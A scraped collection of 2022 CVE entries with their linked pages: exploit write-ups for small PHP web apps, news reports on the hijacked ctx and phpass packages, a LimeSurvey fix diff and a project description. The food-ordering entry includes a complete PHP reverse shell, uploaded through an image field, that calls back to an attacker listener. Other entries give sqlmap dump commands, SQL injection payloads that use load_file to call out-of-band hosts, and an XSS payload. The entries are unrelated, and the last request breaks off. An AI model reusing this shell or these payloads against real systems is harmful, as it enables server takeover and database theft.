An arbitrary file upload vulnerability in the Select Image function of Online Food Ordering System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

\# Online Food Ordering System Unrestricted File Upload + Remote Code Execution \* Exploit Date: 4/18/2022 \* Exploit Author: Nguyen Phu Hung (d4rkp0w4r) # Exploit \* Step => Login to admin -> \`Categoty\` -> \`Add Categoty\` -> \`Upload malicious file\` \* Injection Point => \`Select Image\` !\[\](https://i.imgur.com/LHML1T2.png) \* Use netcat listen web shell \`\`\`python= nc.exe -vv -l -p 9999 \`\`\` \* Log out admin page or stayed, web shell direct connected !!! !\[\](https://i.imgur.com/Kkz3kQc.png) # POC \* Request \`\`\`python= POST /online-food-order/admin/add-category.php HTTP/1.1 Host: 192.168.1.101:8888 Content-Length: 9853 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.101:8888 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydqHz7jzGYIN0VWy4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.101:8888/online-food-order/admin/add-category.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: \_lang=en; PHPSESSID=hpgbm1opdd0qcqb5f73jvpr4ia Connection: close ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="title" Hacked ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="image"; filename="nc.php" Content-Type: application/octet-stream <?php class Shell { private $addr = null; private $port = null; private $os = null; private $shell = null; private $descriptorspec = array( 0 => array('pipe', 'r'), // shell can read from STDIN 1 => array('pipe', 'w'), // shell can write to STDOUT 2 => array('pipe', 'w') // shell can write to STDERR ); private $buffer = 1024; // read/write buffer size private $clen = 0; // command length private $error = false; // stream read/write error public function \_\_construct($addr, $port) { $this->addr = $addr; $this->port = $port; } private function detect() { $detected = true; if (stripos(PHP\_OS, 'LINUX') !== false) { // same for macOS $this->os = 'LINUX'; $this->shell = '/bin/sh'; } else if (stripos(PHP\_OS, 'WIN32') !== false || stripos(PHP\_OS, 'WINNT') !== false || stripos(PHP\_OS, 'WINDOWS') !== false) { $this->os = 'WINDOWS'; $this->shell = 'cmd.exe'; } else { $detected = false; echo "SYS\_ERROR: Underlying operating system is not supported, script will now exit...\\n"; } return $detected; } private function daemonize() { $exit = false; if (!function\_exists('pcntl\_fork')) { echo "DAEMONIZE: pcntl\_fork() does not exists, moving on...\\n"; } else if (($pid = @pcntl\_fork()) < 0) { echo "DAEMONIZE: Cannot fork off the parent process, moving on...\\n"; } else if ($pid > 0) { $exit = true; echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n"; } else if (posix\_setsid() < 0) { // once daemonized you will actually no longer see the script's dump echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n"; } else { echo "DAEMONIZE: Completed successfully!\\n"; } return $exit; } private function settings() { @error\_reporting(0); @set\_time\_limit(0); // do not impose the script execution time limit @umask(0); // set the file/directory permissions - 666 for files and 777 for directories } private function dump($data) { $data = str\_replace('<', '&lt;', $data); $data = str\_replace('>', '&gt;', $data); echo $data; } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream $this->error = true; // set global error flag echo "STRM\_ERROR: Cannot read from ${name}, script will now exit...\\n"; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream $this->error = true; // set global error flag echo "STRM\_ERROR: Cannot write to ${name}, script will now exit...\\n"; } return $bytes; } // read/write method for non-blocking streams private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length $this->dump($data); // script's dump } } // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) // we must read the exact byte length from a stream and not a single byte more private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); $size = $fstat\['size'\]; if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT // we do not like that // we need to discard the data from the stream while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { $this->clen -= $bytes; $size -= $bytes; } } while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { $size -= $bytes; $this->dump($data); // script's dump } } public function run() { if ($this->detect() && !$this->daemonize()) { $this->settings(); // ----- SOCKET BEGIN ----- $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30); if (!$socket) { echo "SOC\_ERROR: {$errno}: {$errstr}\\n"; } else { stream\_set\_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS // ----- SHELL BEGIN ----- $process = @proc\_open($this->shell, $this->descriptorspec, $pipes, null, null); if (!$process) { echo "PROC\_ERROR: Cannot start the shell\\n"; } else { foreach ($pipes as $pipe) { stream\_set\_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS } // ----- WORK BEGIN ----- $status = proc\_get\_status($process); @fwrite($socket, "SOCKET: Shell has connected! PID: " . $status\['pid'\] . "\\n"); do { $status = proc\_get\_status($process); if (feof($socket)) { // check for end-of-file on SOCKET echo "SOC\_ERROR: Shell connection has been terminated\\n"; break; } else if (feof($pipes\[1\]) || !$status\['running'\]) { // check for end-of-file on STDOUT or if process is still running echo "PROC\_ERROR: Shell process has been terminated\\n"; break; // feof() does not work with blocking streams } // use proc\_get\_status() instead $streams = array( 'read' => array($socket, $pipes\[1\], $pipes\[2\]), // SOCKET | STDOUT | STDERR 'write' => null, 'except' => null ); $num\_changed\_streams = @stream\_select($streams\['read'\], $streams\['write'\], $streams\['except'\], 0); // wait for stream changes | will not wait on Windows OS if ($num\_changed\_streams === false) { echo "STRM\_ERROR: stream\_select() failed\\n"; break; } else if ($num\_changed\_streams > 0) { if ($this->os === 'LINUX') { if (in\_array($socket , $streams\['read'\])) { $this->rw($socket , $pipes\[0\], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (in\_array($pipes\[2\], $streams\['read'\])) { $this->rw($pipes\[2\], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (in\_array($pipes\[1\], $streams\['read'\])) { $this->rw($pipes\[1\], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } else if ($this->os === 'WINDOWS') { // order is important if (in\_array($socket, $streams\['read'\])/\*------\*/) { $this->rw ($socket , $pipes\[0\], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (($fstat = fstat($pipes\[2\])) && $fstat\['size'\]) { $this->brw($pipes\[2\], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (($fstat = fstat($pipes\[1\])) && $fstat\['size'\]) { $this->brw($pipes\[1\], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } } } while (!$this->error); // ------ WORK END ------ foreach ($pipes as $pipe) { fclose($pipe); } proc\_close($process); } // ------ SHELL END ------ fclose($socket); } // ------ SOCKET END ------ } } } echo '<pre>'; // change the host address and/or port number as necessary $sh = new Shell('192.168.1.101', 9999); $sh->run(); unset($sh); // garbage collector requires PHP v5.3.0 or greater // @gc\_collect\_cycles(); echo '</pre>'; ?> ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="featured" Yes ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="active" Yes ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="submit" Add Category ------WebKitFormBoundarydqHz7jzGYIN0VWy4-- \`\`\`

CVE-2022-29651: Online Food Ordering System Unrestricted File Upload + Remote Code Execution - HackMD

Online Food Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the Search parameter at /online-food-order/food-search.php.

\# Online Food Ordering System Unauthenticated Sql Injection \* Exploit Date: 4/18/2022 \* Exploit Author: Nguyen Phu Hung (d4rkp0w4r) # Exploit \* Injection Point => \`Search\` !\[\](https://i.imgur.com/7SaRKPz.jpg) \* Use Burp Suite capture request then save as \`food.txt\` !\[\](https://i.imgur.com/RxxNRAR.png) \* Use \`Sqlmap\` exploit databases \`\`\`python= python sqlmap.py -r food.txt -batch -current-db \`\`\` !\[\](https://i.imgur.com/Ajuhaeu.png) \`\`\`python= python sqlmap.py -r food.txt -batch -D onlinefoodorder -tables \`\`\` !\[\](https://i.imgur.com/u0b1253.png) \`\`\`python= python sqlmap.py -r food.txt -columns -D onlinefoodorder -T tbl\_admin -dump \`\`\` \*\*Information Disclosure\*\* !\[\](https://i.imgur.com/HcgSNbi.png) # Vulnerable Code !\[\](https://i.imgur.com/CC9MvzY.png) \* No filter \`search\` when inserting data to database # POC \* Request \`\`\`python= POST /online-food-order/food-search.php HTTP/1.1 Host: 192.168.1.101:8888 Origin: http://192.168.1.101:8888 Cookie: PHPSESSID=g4piuq3kkuno5h981rkgb3njva Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.101:8888/online-food-order/foods.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 140 search=373255'%2b(select%20load\_file('%5c%5c%5c%5cmsio14xruabfnv9ja1936c9phgn9b8zz2nuaky9.burpcollaborator.net%5c%5cqtq'))%2b'&submit=Search \`\`\`

CVE-2022-29650: Online Food Ordering System Unauthenticated Sql Injection - HackMD

A suspicious developer appears to have performed a domain hijack to take over the original project

A suspicious developer appears to have performed a domain hijack to take over the original project

A malicious and potentially hijacked Python package, CTX, has been removed from the Python Package Index (PyPI) repository after social media users alerted the team to its presence.

On May 24, Indian hacker Somdev Sangwan alerted developers on Twitter to a potential security issue impacting Python’s CTX library. In a tweet, Sangwan said:

Python’s CTX library and a fork of PHP’s phpass have been compromised. Three million users combined. The malicious code sends all the environment variables to a Heroku app, likely to mine AWS credentials.

Environmental variables can also include other forms of credentials and API keys.

The researcher was first made aware of the problematic package on a Reddit thread.

**Malicious update**

On May 22, a Reddit user with the moniker SocketPuppets said there had been a new update to CTX, a project hosted on both GitHub and PyPI.

The GitHub repository for the original project, designed for simple dictionary item queries using dot notation software for Python, has not been updated for roughly eight years.

“The OP \[original poster\] said it was recently updated, and on PyPI it was updated as of May 21,” Sangwan noted. “But the GitHub repo does not reflect any changes.”

**DON’T MISS** Critical Argo CD vulnerability could allow attackers admin privileges

He was not the only one to question the update. On the Reddit thread, users queried why environmental variables were sent to a URL – https://web.herokuapp.com/hacked – after examining the open source project’s source code and why the GitHub repository had not been updated.

SocketPuppets said: “I created a new company account and repository for new versions so the source will be totally changed.”

SockPuppets’ post history leads to a Medium blog and contact details potentially linking them to other GitHub repositories under the name ‘aydinnyunuss’.

As noted by Reddit user ‘antipsychosis’, the GitHub account belonging to this name, apparently belonging to a developer/student from Istanbul’s Commerce University, is the creator of GateCracker. This software also pings requests to Heroku apps.

**Expired domain**

The individual responsible for uploading the malicious package to PyPI exploited an expired domain, purchased the name, and then obtained ownership of the email address registered to the original repository.

In other words, they did so to send a password retrieval email to themselves and masquerade as the original project maintainer.

Sangwan also found evidence of a phpass compromise. In total, the impacted packages have been downloaded an estimated three million times, but only users who have downloaded them within the last week or so appear to be impacted.

Read more of the latest news about secure development

The CTX package, as well as other impacted libraries, have since been removed from the repository.

The Python Foundation told _The Daily Swig_ that the compromise “was of a single user account due to re-registration over an expired domain.

“The domain that hosted the users email address was re-registered 2022-05-14T18:40:05Z and a password reset completed successfully for the user at 2022-05-14T18:52:40Z,” the organization added. “Original releases were then deleted and malicious copies uploaded.”

PyPI itself was not directly compromised.

In a subsequent write-up, the foundation noted that users who installed the CTX package between May 14 and May 24, 2022 were impacted. If user environment variables contain sensitive data, the organization advises the rotation of passwords and keys.

SocketPuppets/aydinnyunuss has not responded to requests for comment.

_The Daily Swig_ has reached out to the CTX project maintainers and we will update if and when we hear back.

**RECOMMENDED** DBIR 2022: Ransomware surge increases global data breach woes

Malicious Python library CTX removed from PyPI repo

A cross-site scripting (XSS) vulnerability in uploadConfirm.php of LimeSurvey v5.3.9 and below allows attackers to execute arbitrary web scripts or HTML via a crafted plugin.

@@ -2,8 +2,7 @@ <div class\='pagetitle h3'\><?php eT('Confirm uploaded plugin'); ?></div\>  
<?php // Only show config summary if config could be found. ?> <?php if (isset($config)): ?>  
<?php if (isset($config)) : ?> <?php echo CHtml::form( Yii::app()->getController()->createUrl( '/admin/pluginmanager', @@ -16,14 +15,14 @@  
<input type\="hidden" name\="isUpdate" value\="<?php echo json\_encode($isUpdate); ?>" />  
<?php if ($isUpdate): ?> <?php if ($isUpdate) : ?> <div class\='alert alert-info'\> <p\> <i class\='fa fa-info'\></i\>&nbsp; <?php eT('The following plugin will be updated. Please click "Update" to update the plugin, or "Abort" to abort.'); ?> </p\> </div\> <?php else: ?> <?php else : ?> <div class\='alert alert-info'\> <p\> <i class\='fa fa-info'\></i\>&nbsp; @@ -35,33 +34,33 @@  <div class\="form-group col-sm-12"\> <label class\="col-sm-4 control-label"\><?php eT("Name:"); ?></label\> <div class\="col-sm-4"\><?php echo $config\->getName(); ?></div\> <div class\="col-sm-4"\><?\=htmlentities($config\->getName()); ?></div\> </div\>  
 <div class\="form-group col-sm-12"\> <label class\="col-sm-4 control-label"\><?php eT("Description:"); ?></label\> <div class\="col-sm-8"\><?php echo $config\->getDescription(); ?></div\> <div class\="col-sm-8"\><?\=htmlentities($config\->getDescription()); ?></div\>

**This comment has been minimized.**

Copy link

****Shnoulle** Apr 20, 2022**

Collaborator

Hu … some plugin have HTML or markdown in descrition.

Since this plugin part are PHP system and can not be updated by simple user. I really think it's a bad idea …

**This comment has been minimized.**

Copy link

****Shnoulle** Apr 20, 2022 •**

Collaborator

Oups : only upload confirm. Maybe then …  
But htmlentities : striptags or filter …

</div\>  
 <div class\="form-group col-sm-12"\> <label class\="col-sm-4 control-label"\><?php eT("Version:"); ?></label\> <div class\="col-sm-4"\><?php echo $config\->getVersion(); ?></div\> <div class\="col-sm-4"\><?\=htmlentities($config\->getVersion()); ?></div\> </div\>  
 <div class\="form-group col-sm-12"\> <label class\="col-sm-4 control-label"\><?php eT("Author:"); ?></label\> <div class\="col-sm-4"\><?php echo $config\->getAuthor(); ?></div\> <div class\="col-sm-4"\><?\=htmlentities($config\->getAuthor()); ?></div\> </div\>  
 <div class\="form-group col-sm-12"\> <label class\="col-sm-4 control-label"\><?php eT("Compatible"); ?></label\> <?php if ($config\->isCompatible()): ?> <?php if ($config\->isCompatible()) : ?> <div class\="col-sm-4"\><span class\="fa fa-check text-success"\></span\></div\> <?php else: ?> <?php else : ?> <div class\="col-sm-4"\><span class\="fa fa-times text-warning"\></span\></div\> <?php endif; ?> </div\> @@ -70,9 +69,9 @@ <div class\="form-group col-sm-12"\> <label class\="col-sm-4 control-label"\></label\> <div class\="col-sm-4"\> <?php if ($isUpdate): ?> <?php if ($isUpdate) : ?> <input type\="submit" class\="btn btn-success" value\="<?php eT("Update");?>" /> <?php else: ?> <?php else : ?> <input type\="submit" class\="btn btn-success" value\="<?php eT("Install");?>" /> <?php endif; ?> <a href\="<?php echo $abortUrl; ?>" class\="btn btn-warning" data-dismiss\="modal"\><?php eT("Abort");?></a\> @@ -81,8 +80,7 @@  
</form\>  
<?php else: ?>  
<?php else : ?> <div class\='alert alert-warning'\> <p\> <i class\='fa fa-warning'\></i\>&nbsp;

CVE-2022-29710: Fixed issue: [security] Minor XSS issue in plugin overview - reported… · LimeSurvey/LimeSurvey@f7b3561

A stored cross-site scripting (XSS) vulnerability in /scas/?page=clubs/application_form&id=7 of School Club Application System v0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter.

Submitted by oretnom23 on Thursday, April 7, 2022 - 17:48.

****Introduction****

This simple project is a **School Clubs Application System**. This is a web-based application project developed in **PHP** and **MySQL Database**. this application provides an online platform for exploring the different clubs in certain schools and submitting a membership application. This project has a simple and pleasant user interface using **Material Kit 2 Template** and **Bootstrap 5 Framework**. It consists of user-friendly features and functionalities.

****About the School Clubs Application System****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Google Material Icon**
*   **Material Kit 2 Template**

This **School Clubs Application System** is accessible to the **School Management, Club's Admin/Staff, and Students**. The **Management Site** is the side of the system where the school management has the privilege to access and manage the list of the school's student clubs. This site requires the **Admin Type** user credentials in order to gain access to the features and functionalities of this site. The **admin users** are the only ones who can register the **Club's Admin/Staff Users**. The **Club's Admin/Staff site** is the side of the application where the admin or staff of a certain club can manage the membership applications to their club submitted on the system. They can also update the application status. They can also view the basic information of the applicant including their contact information where they can reach back to the application according to their application. The students can access only the public site of the application where they are allowed to explore the active clubs of the school and read the information about each club.

****Features********Admin-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Club Management**
    *   Add New Club
    *   List All Clubs
    *   View Club Details
    *   Edit Club Details
    *   Delete Club Details
*   **User Management**
    *   Add New User
    *   List All Users
    *   View User Details
    *   Edit User Details
    *   Delete User Details
*   **Application Management**
    *   Add New Application
    *   List All Applications
    *   View Application Details
    *   Edit Application Details
    *   Delete Application Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

****Club's Admin/Staff-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Application Management**
    *   Add New Application
    *   List All Applications
    *   View Application Details
    *   Edit Application Details
    *   Delete Application Details
*   **Update Account Details/Credentials**
*   **Login and Logout**

****Public-Side****

*   **Home Page**
    *   Display the Welcome Content.
*   **'About Us' Content**
*   **List All Active Clubs**
*   **View Club's Details**
*   **Club's Application Form**
*   **Submit Application**
*   **Login and Logout**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots of some Features******Public-Side's Club List****

****Admin-Side Home Page****

****Club Details (Admin-Side)****

****User Details (Admin-Side)****

****Club's Admin/Staff-Side Home Page****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)
*   **Download** the project assets at https://www.dropbox.com/s/tocky9atdwtk1gs/scas\_assets.zip?dl=1

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Extract** the **downloaded assets **zip** file**.
6.  **Copy** the extracted assets folder and **paste** it into the **source code** root path.
7.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
8.  **Create** a **new database** naming ****scas\_db****.
9.  **Import** the provided ****SQL**** file. The file is known as ****scas\_db.sql**** located inside the **database** folder.
10.  **Browse** the **School Clubs Application System** in a **browser**. i.e. ****http://localhost/scas/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****DEMO VIDEO****

That's it. You can now explore the features and functionalities of this **School Clubs Application System** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   1578 views

CVE-2022-29359: School Club Application System in PHP/OOP Free Source Code

Online Fire Reporting System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Online Fire Reporting System 1.0 SQLi## Author: nu11secur1ty## Date: 05.24.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting## Description:The `date` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'was submitted in the `date` parameter.The attacker can take administrator accounts control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: date (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: page=reports&date=2022-05-24'+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''OR NOT 3052=3052 AND 'yrRg'='yrRg    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: page=reports&date=2022-05-24'+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''AND (SELECT 8940 FROM(SELECT COUNT(*),CONCAT(0x7170766b71,(SELECT(ELT(8940=8940,1))),0x7162767171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ATCs'='ATCs    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=reports&date=2022-05-24'+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''AND (SELECT 9304 FROM (SELECT(SLEEP(5)))aaXF) AND 'lAbH'='lAbH    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: page=reports&date=2022-05-24'+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170766b71,0x6d464b4556785048787241587a49795869777141684b4d5252784244626f77424b514675714f7349,0x7162767171),NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting)## Proof and Exploit:[href](https://streamable.com/znojdy)

Online Fire Reporting System 1.0 SQL Injection

Two trojanized Python and PHP packages have been uncovered in what's yet another instance of a software supply chain attack targeting the open source ecosystem.
One of the packages in question is "ctx," a Python module available in the PyPi repository. The other involves "phpass," a PHP package that's been forked on GitHub to distribute a rogue update.
"In both cases the attacker appears to have

Two trojanized Python and PHP packages have been uncovered in what's yet another instance of a software supply chain attack targeting the open source ecosystem.

One of the packages in question is "ctx," a Python module available in the PyPi repository. The other involves "phpass," a PHP package that's been forked on GitHub to distribute a rogue update.

"In both cases the attacker appears to have taken over packages that have not been updated in a while," the SANS Internet Storm Center (ISC) said, one of whose volunteer incident handlers, Yee Ching, analyzed the ctx package.

It's worth noting that ctx was last published to PyPi on December 19, 2014. On the other hand, phpass hasn't received an update since it was uploaded to Packagist on August 31, 2012.

The malicious Python package, which was pushed to PyPi on May 21, 2022, has been removed from the repository, but the PHP library still continues to be available on GitHub.

In both instances, the modifications are designed to exfiltrate AWS credentials to a Heroku URL named 'anti-theft-web.herokuapp\[.\]com.' "It appears that the perpetrator is trying to obtain all the environment variables, encode them in Base64, and forward the data to a web app under the perpetrator's control," Ching said.

It's suspected that the attacker managed to gain unauthorized access to the maintainer's account to publish the new ctx version. Further investigation has revealed that the threat actor registered the expired domain used by the original maintainer on May 14, 2022.

Linux diff command executed on original ctx 0.1.2 Package and the "new" ctx 0.1.2 Package

"With control over the original domain name, creating a corresponding email to receive a password reset email would be trivial," Ching added. "After gaining access to the account, the perpetrator could remove the old package and upload the new backdoored versions."

Coincidentally, on May 10, 2022, security consultant Lance Vick disclosed how it's possible to purchase lapsed NPM maintainer email domains and subsequently use them to re-create maintainer emails and seize control of the packages.

What's more, a metadata analysis of 1.63 million JavaScript NPM packages conducted by academics from Microsoft and North Carolina State University last year uncovered 2,818 maintainer email addresses associated with expired domains, effectively allowing an attacker to hijack 8,494 packages by taking over the NPM accounts.

"In general, any domain name can be purchased from a domain registrar allowing the purchaser to connect to an email hosting service to get a personal email address," the researchers said. "An attacker can hijack a user's domain to take over an account associated with that email address."

Should the domain of a maintainer turn out to be expired, the threat actor can acquire the domain and alter the DNS mail exchange (MX) records to appropriate the maintainer's email address.

"Looks like the phpass compromise happened because the owner of the package source - 'hautelook' deleted his account and then the attacker claimed the username," researcher Somdev Sangwan said in a series of tweets, detailing what's called a repository hijacking attack.

Public repositories of open source code such as Maven, NPM, Packages, PyPi, and RubyGems are a critical part of the software supply chain that many organizations rely on to develop applications.

On the flip side, this has also made them an attractive target for a variety of adversaries seeking to deliver malware.

This includes typosquatting, dependency confusion, and account takeover attacks, the latter of which could be leveraged to ship fraudulent versions of legitimate packages, leading to widespread supply chain compromises.

"Developers are blindly trusting repositories and installing packages from these sources, assuming they are secure," DevSecOps firm JFrog said last year, adding how threat actors are using the repositories as a malware distribution vector and launch successful attacks on both developer and CI/CD machines in the pipeline.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Popular PyPI Package 'ctx' and PHP Library 'phpass' Hijacked to Steal AWS Keys

Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.45 and 4.1.1, template authors could inject php code by choosing a malicious {block} name or {include} file name. Sites that cannot fully trust template authors should upgrade to versions 3.1.45 or 4.1.1 to receive a patch for this issue. There are currently no known workarounds.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Changelog
    
*   *   By Plan
    *   Enterprise
    *   Teams
    *   Compare all
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2022-29221: Release v3.1.45 · smarty-php/smarty

Covid-19 Travel Pass Management System v1.0 is vulnerable to SQL Injection via /ctpms/classes/Master.php?f=update_application_status

Permalink

Cannot retrieve contributors at this time

**covid-19-travel-pass-management-system v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ctpms/classes/Master.php?f=update\_application\_status

Vulnerability location:/ctpms/classes/Master.php?f=update\_application\_status, id

\[+\] Payload: 1'and/\*\*/extractvalue(1,concat(char(126),database()))and' // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /ctpms/classes/Master.php?f=update_application_status HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------4024160998608039623756913069
    Content-Length: 335
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/ctpms/admin/?page=applications/view_application&id=1
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------4024160998608039623756913069
    Content-Disposition: form-data; name="id"
    
    1'and/**/extractvalue(1,concat(char(126),database()))and'
    -----------------------------4024160998608039623756913069
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------4024160998608039623756913069--

CVE-2022-30838: bug_report_CVE/sql.md at main · mikeccltt/bug_report_CVE

Room-rent-portal-site v1.0 is vulnerable to Cross Site Scripting (XSS) via /rrps/classes/Master.php?f=save_category, vehicle_name.

Permalink

**room-rent-portal-site - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15301/room-rent-portal-site-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /rrps/classes/Master.php?f=save\_category

Vulnerability location: /rrps/classes/Master.php?f=save\_category, vehicle\_name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.106/rrps/classes/Master.php?f=save_category HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------39324278941716868132909560787
    Content-Length: 416
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/rrps/admin/?page=categories
    Cookie: PHPSESSID=h4hpbcj74nsiroalrkj8o2251s
    
    -----------------------------39324278941716868132909560787
